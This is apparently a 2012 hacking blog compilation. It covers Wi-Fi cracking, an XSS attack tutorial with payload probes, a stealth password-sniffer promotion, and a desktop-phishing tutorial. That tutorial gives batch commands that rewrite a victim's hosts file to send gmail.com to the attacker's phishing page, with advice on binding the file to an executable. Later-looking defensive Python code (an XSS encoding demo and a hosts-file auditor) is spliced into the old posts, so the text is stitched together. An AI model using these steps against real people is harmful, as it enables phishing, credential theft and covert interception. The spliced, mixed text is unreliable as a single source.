
Monday, July 30, 2012

How to hack a wifi network?



You don't have to be an IT expert to make use of your neighbour's security-enabled Wifi network. Just watch one of the dozens of online videos that explain how.

Despite most of them being protected by some kind of password (WEP, WPA etc.), Wifi networks are still relatively vulnerable. And by using another person's network, hackers can illegally download documents or attack websites without being traced.
If pirates download paedophilic pornography over such a connection, it is the owner of the home network, the person who pays the monthly wireless fee, who will find himself in court. In France, the anti-piracy law Hadopi 2 enforces this by making it possible to sentence a home network owner for having a poorly protected network.

This video, viewed over a million times, shows how, with the aid of software, you can get hold of the password to a wireless network. 
Emilien Girault is an IT security consultant for SysDream.
"A Wifi network is as safe as the person who installs it is knowledgeable. There are three basic levels of protection: WEP, WPA and WPA2 keys. Most attacks target WEP keys, because they're the least secure. To hack a WPA key, more sophisticated material is sometimes necessary. Generally, the longer the password is, the harder it is to steal.
First you have to spy on the network, which we call 'sniffing'. You survey the traffic and try to find the password. To do that you can launch what's called a 'dictionary' attack: a programme that tries out the various names that exist in the dictionary. There's also a 'brute force' attack, which tries all possible character combinations. A password that's more than eight characters long can take over a week to find.
It's sometimes the internet provider that is at fault. Just recently hackers realised that the default passwords given out by Bbox [a three-way wireless box offered by French mobile telecoms company Bouygues Telecom] were automatically generated from the network name. As most people don't bother to change their password, it meant that their networks were left exposed. This vulnerability is mainly due to a lack of education on the part of the users, which is then taken advantage of by hackers, making their work all the easier.
Open networks, or 'hotspots' that you can log on to in airports or train stations, are also affected. Internet providers are setting up increasing numbers of these hotspots. And although they require identification, there are ways of getting around the checkpoint. One technique is to put in place a 'fake hotspot' in order to trick users into entering their user details into the fake portal. It then saves the data and enters it into a database owned by the hackers. The details can then be used to connect to the internet, or shared with others.
If you put all of this in the context of the Hadopi law, which enforces, amongst other things, the punishment of individuals who do not secure their connection, you soon realise that actually applying the law is very difficult. Firstly, we need to define exactly what a secure computer or network is..."

Source: http://observers.france24.com/

Thursday, July 26, 2012

WebSiteSniffer


WebSiteSniffer is a free packet sniffer that captures the files your browser downloads while you browse the Internet and stores them on your PC's hard drive under a folder you specify.
This excellent Windows packet capture app lets you choose which types of website files to capture: text files, HTML files, CSS files, XML files, images, video/audio files, Flash (.swf) files or scripts.
While capturing the downloaded files, the main window of this packet sniffer displays general statistics for each download, such as size and the number of files of each type (images, text, HTML and so on).
The best part is that WebSiteSniffer doesn't require any installation. However, in order to get started with this packet sniffing software, you need to give a couple of minutes to the download process.
Basic System Requirements:
WebSiteSniffer works well with any version of Windows, starting from Windows 2000 and up to Windows 7, including 64-bit systems.

How to Download Packet Sniffer: WebSiteSniffer

  • Go to the website linked below.
  • Scroll down to the "Feedback" section and click "Download WebSiteSniffer" (choose the 32-bit or x64 version, whichever is compatible with your system).
  • Double-click the downloaded file.
  • Since it is a zip file, you need to extract it. Click "Extract All" in the navigation bar.
  • Click "Extract".
  • Once the files are extracted, simply run the executable file, WebSiteSniffer.exe.
Yup... there you are. Start capturing the statistics of your downloaded files straight away. This free packet analyzer is highly recommended if you want to know more about the files you have downloaded.
You can also check the Network Packet Sniffer reviewed by us.
In short, WebSiteSniffer is an excellent network sniffer that captures statistics of all the downloaded files. Go ahead and download WebSiteSniffer for free!
Source: http://www.ilovefreesoftware.com

Cross Site Scripting(XSS) Complete Tutorial


What is XSS?
Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users. In a typical XSS attack, a hacker injects malicious JavaScript code into a legitimate website. When a user visits the infected page or a specially crafted link, the browser executes the malicious JavaScript. A successfully exploited XSS vulnerability allows attackers to carry out phishing attacks, steal accounts and even spread worms.

Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail and injects a malicious script. When a user visits the site, the malicious script executes. The malicious code can be used to redirect users to a fake Gmail page or to capture cookies. Using the stolen cookies, the attacker can log in to your account and change the password.
It will be helpful for understanding XSS if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of the HTTP client-server architecture (Reference).
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP).

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use Google dorks to find vulnerable sites, for instance "?search=" or ".php?q=". More skilled ("1337") attackers target specific sites instead of using Google search. If you are going to test your own site, you have to check every page of your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find an input field into which we can inject our own script, for example a search box, username, password or any other input field.


Test 1 :
Once we have found the input field, let us try to put some string inside the field; for instance, let me input "BTS". The page will display the result.


Now right-click on the page and select "View source". Search for the string "BTS" which we entered in the input field and note the location where the input is placed.


Test 2:
Now we are going to check whether the server sanitizes our input or not. In order to do this, let us input the <script> tag in the input field.

View the source of the page and find the location where the input was displayed in the previous test.

Thank god, our code is not being sanitized by the server: the code is exactly what we entered in the field. If the server sanitized our input, the code would look like this: &lt;script&gt;. This indicates that the website is vulnerable to an XSS attack and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS. But let us make sure the site is completely vulnerable to this attack by injecting a full JavaScript snippet. For instance, let us input <script>alert('BTS')</script>.


It will now display a pop-up box with the string 'BTS'. Finally, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.


Types of XSS based on persistence:
Based on persistence, we can categorize XSS attacks into two types, namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database, and is then permanently run as part of the normal page.

For Example:   
Many websites host a support forum where registered users can ask their questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input provided, the injected script is executed. The code will run whenever a user reads the post. If the injected code is cookie-stealing code, it will steal the cookies of every user who reads the post. Using the cookie, the attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in an HTTP request. The server embeds the input in the HTML and returns it to the browser in the HTTP response. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Let us consider a project hosting website. To find our favourite project, we just type the related word in the search box. When the search is finished, it displays a message like "search results for yourword". If the server fails to sanitize the input properly, an injected script is executed.

In the case of reflected XSS attacks, the attacker sends the specially crafted link to victims and tricks them into clicking it. When the user clicks the link, the browser sends the injected code to the server, the server reflects the attack back to the user's browser, and the browser then executes the code.
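The "view source" check from Test 2 and Step 3, and the difference between the reflected search page and the stored forum post, come down to one thing: whether user input is HTML-encoded before it is placed into the page. The following Python is an added example written for this page, not code from the original tutorial or from breakthesecurity.com. It renders the "search results for yourword" page once without output encoding and once with it, reproduces the tutorial's probe check programmatically, and adds a small in-memory forum (a constructed stand-in for the support-forum example) that stores posts raw and encodes them at render time. The function and class names are assumptions of the example.

```python
import html

# Added example, not from the original tutorial: a reflected search page
# with and without output encoding, plus a stored-post store that shows
# where the encoding belongs (at render time, for every reader).


def render_search_vulnerable(query: str) -> str:
    """Reflect the query verbatim into the page: the Test 2 case where
    '<script>' comes back unchanged and the browser treats it as markup."""
    return f"<p>search results for {query}</p>"


def render_search_hardened(query: str) -> str:
    """HTML-encode the query before placing it in element content, so the
    browser shows the probe as text (the '&lt;script&gt;' seen in Test 2)."""
    return f"<p>search results for {html.escape(query, quote=True)}</p>"


def reflects_markup_unescaped(rendered: str, probe: str) -> bool:
    """The check the tutorial performs by hand in 'view source': does the
    page contain the probe byte-for-byte, with its angle brackets intact?"""
    return probe in rendered


class ForumPosts:
    """Minimal stand-in (constructed) for the support-forum example of
    Persistent XSS. Posts are stored exactly as submitted; encoding is
    applied when the page is built, so readers receive text, not script."""

    def __init__(self) -> None:
        self._posts = []  # list of raw post bodies, as the user typed them

    def submit(self, body: str) -> None:
        self._posts.append(body)  # stored raw; sanitizing here is not enough

    def render(self) -> str:
        items = "".join(
            f"<li>{html.escape(p, quote=True)}</li>" for p in self._posts
        )
        return f"<ul>{items}</ul>"


if __name__ == "__main__":
    probe = "<script>alert('BTS')</script>"  # the tutorial's Step 3 payload
    for label, page in (
        ("vulnerable", render_search_vulnerable(probe)),
        ("hardened", render_search_hardened(probe)),
    ):
        print(f"{label:10s} reflects raw markup: "
              f"{reflects_markup_unescaped(page, probe)}")
    forum = ForumPosts()
    forum.submit("How do I reset my password?")
    forum.submit(probe)
    print(forum.render())
```

Running it shows the vulnerable page echoing the probe unchanged while the hardened page returns the entity-encoded form; the forum output shows the same encoding protecting every reader of the stored post. Encoding at render time rather than at submit time matters because the stored text is reused in more than one context (page, feed, e-mail notification), and each context needs its own encoding.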

In addition to these types, there is also a third type of attack called DOM Based XSS; I will explain that attack in later posts.

What can an attacker do with this vulnerability?

  • Stealing identities and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing sessions).
  • Malware attacks.
  • Website defacement.
  • Denial of Service (DoS) attacks.
Source: http://www.breakthesecurity.com
 

Ace Password Sniffer



Capture passwords through http, ftp, smtp, pop3, telnet.
The new version provides candidate usernames and passwords for HTTP POST submissions.
This effective password recovery utility brings you a brand-new way to get your forgotten password back. Network administrators or concerned parents can also use it to capture the passwords of other users, but such action may be considered an invasion of privacy, so make sure you have the right to do so. Currently Ace Password Sniffer supports password monitoring through FTP, POP3, HTTP, SMTP and Telnet, including some web mail passwords.
Ace Password Sniffer works passively and doesn't generate any network traffic, therefore it is very hard for others to detect. And you needn't install any additional software on the target PCs or workstations. If your network is connected through a switch, you can run the sniffer on the gateway or proxy server, which sees all network traffic.
This stealth-monitoring utility is useful for recovering your network passwords, for parents to receive their children's network passwords, and for server administrators to monitor password abuse.



Read more: http://www.effetech.com/aps/

Wednesday, July 25, 2012

Desktop Phishing - Step by step tutorial


It is an advanced form of phishing. Kindly read my previous post on normal phishing here before proceeding. The difference between phishing and desktop phishing is as follows.

In phishing:-

1. Attacker convinces the victim to click on the link of a fake login page which resembles a genuine login page.
2. Victim enters his credentials in the fake login page, which go to the attacker.
3. Victim is then redirected to an error page or the genuine website, depending on the attacker.

But the main drawback of phishing is that the victim can easily differentiate between the fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to the victim, who is supposed to double-click on it. The attacker's job is done.
2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, so the victim doesn't notice.
3. The rest is the same as in normal phishing.


What is Hosts File ?

The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com, a query is sent to a Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for an IP address associated with the domain name.

Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.

What is the attack?
I hope you have got an idea of how modification of this hosts file on the victim's computer can be misused. We need to modify the victim's hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he would be directed to our fake login page and the domain name in the URL box would remain genuine as typed by the victim. Hence the domain name is spoofed.

Two steps to perform the attack:-
1. Create and host the phishing page on your computer.
2. Modify the victim's hosts file.

Step 1 -:

Web hosting sites like 110mb.com, ripway.com etc., where we usually upload our phishing page, do not provide an IP that points to your website like www.anything.110mb.com: an IP address points to a webserver and not a website. So we need to host the phishing page on our computer using webserver software like WAMP or XAMPP.
Kindly read my simple tutorial on setting up the XAMPP webserver here and this step would be clear to you.

Step 2. This step can be performed in two different ways.

Method 1 - Send the victim a zip file containing the modified hosts file. When the zip file is clicked, it would automatically replace the victim's original hosts file with the modified hosts file.

Copy your hosts file and paste it anywhere. Edit it with any text editor and associate your public IP address with the domain you wish, as shown.

Like in this case, when the victim visits gmail.com, he would be taken to the website hosted on IP 'xxx.xxx.xxx.xxx'. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location C:\Windows\system32\drivers\etc and the victim's hosts file gets replaced by our modified hosts file.
Then you can bind this file with any exe (using a binder) or directly give it to the victim. He is supposed to click it and you are done.

Method 2 - Create a batch file which would modify the hosts file as per your need.
Open Notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously, replace these with your IP and website.

Save the file as 'All files' instead of a text file and name it anything.bat. The extension must be .bat.
When the victim runs this file, a new entry will be made in the hosts file.

You can test both of the above methods by modifying your own hosts file.

Limitations of the attack:-
1. Our public IP address is most probably dynamic, so it changes every time we disconnect and reconnect. To overcome this we need to purchase a static IP from our ISP.
2. The browser may warn the victim that the digital certificate of the website is not genuine.

Countermeasures:-
Never blindly enter your credentials in a login page, even if you yourself have typed the domain name in the web browser. Check whether the protocol is "http" or "https"; https is secure.
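Because the whole attack rests on a hosts file entry that sends a genuine domain name somewhere other than its real server, the most direct countermeasure on the machine itself is to audit that file. The following Python is an added example for this page, not code from the original post or from explorehacking.com. It parses the hosts file format described above (one address followed by one or more names per line, `#` starting a comment), and flags two kinds of entry: a domain from a watch list of login sites mapped anywhere other than loopback, and any name pinned to an address outside the loopback, link-local and RFC 1918 ranges, which is what the post's `echo ... >> hosts` lines produce. The watch list, the function names and the sample hosts file are all constructed for the example; the two public-looking addresses in the sample are from the documentation ranges and stand in for an attacker's public IP.

```python
import ipaddress
from typing import List, Tuple

# Added example, not from the original post: audit a Windows hosts file
# for the tampering described above, i.e. a well-known login domain
# pinned to some address other than the machine itself.

HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"  # location given in the post

# Domains whose presence in a home machine's hosts file is suspicious (constructed list)
WATCHED_DOMAINS = {"gmail.com", "www.gmail.com", "accounts.google.com"}

# Loopback, RFC 1918, link-local and ULA ranges: the normal destinations of hosts entries
LOCAL_RANGES = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_local(ip) -> bool:
    # 'in' is False when address and network are of different IP versions
    return any(ip in net for net in LOCAL_RANGES)


def parse_hosts(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, address, hostname) for every mapping in the file."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        parts = line.split()
        if len(parts) < 2:
            continue  # blank, comment-only, or has no hostname
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # first token is not an address: skip malformed line
        for name in parts[1:]:
            entries.append((lineno, parts[0], name.lower()))
    return entries


def find_suspicious(text: str, watched=WATCHED_DOMAINS) -> List[Tuple[int, str, str, str]]:
    """Flag watched domains redirected off loopback, and any name pinned to a
    non-local address (the post's attack uses the attacker's public IP)."""
    hits = []
    for lineno, ip_text, name in parse_hosts(text):
        ip = ipaddress.ip_address(ip_text)
        if ip.is_loopback:
            continue  # mapping a name to the machine itself is the normal use
        if name in watched or any(name.endswith("." + w) for w in watched):
            hits.append((lineno, ip_text, name, "watched domain redirected"))
        elif not is_local(ip):
            hits.append((lineno, ip_text, name, "name pinned to a public address"))
    return hits


def audit_hosts_file(path: str = HOSTS_PATH) -> List[Tuple[int, str, str, str]]:
    """Audit the real hosts file on this machine (run as a user who can read it)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_suspicious(fh.read())


# Constructed sample hosts file. 203.0.113.10 and 198.51.100.7 are documentation
# addresses standing in for an attacker's public IP.
SAMPLE_HOSTS = """\
# constructed sample of a Windows hosts file
127.0.0.1       localhost
::1             localhost
192.168.1.20    build-server.corp.example   # internal name on a private address: normal
203.0.113.10    gmail.com www.gmail.com     # what Method 1 / Method 2 above would leave behind
10.0.0.5        accounts.google.com
198.51.100.7    updates.vendor.example
"""

if __name__ == "__main__":
    for lineno, ip, name, reason in find_suspicious(SAMPLE_HOSTS):
        print(f"line {lineno}: {ip} -> {name}: {reason}")
```

On the sample it reports the two gmail.com names and accounts.google.com as watched domains redirected, and updates.vendor.example as a name pinned to a public address, while the internal build server on a private address passes. Calling `audit_hosts_file()` with no argument checks the real file at the path the post gives; the second limitation the post lists (a certificate warning in the browser) is the other signal a user will see, since a phishing page served from the attacker's IP cannot present a valid certificate for the spoofed name.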

Source: http://www.explorehacking.com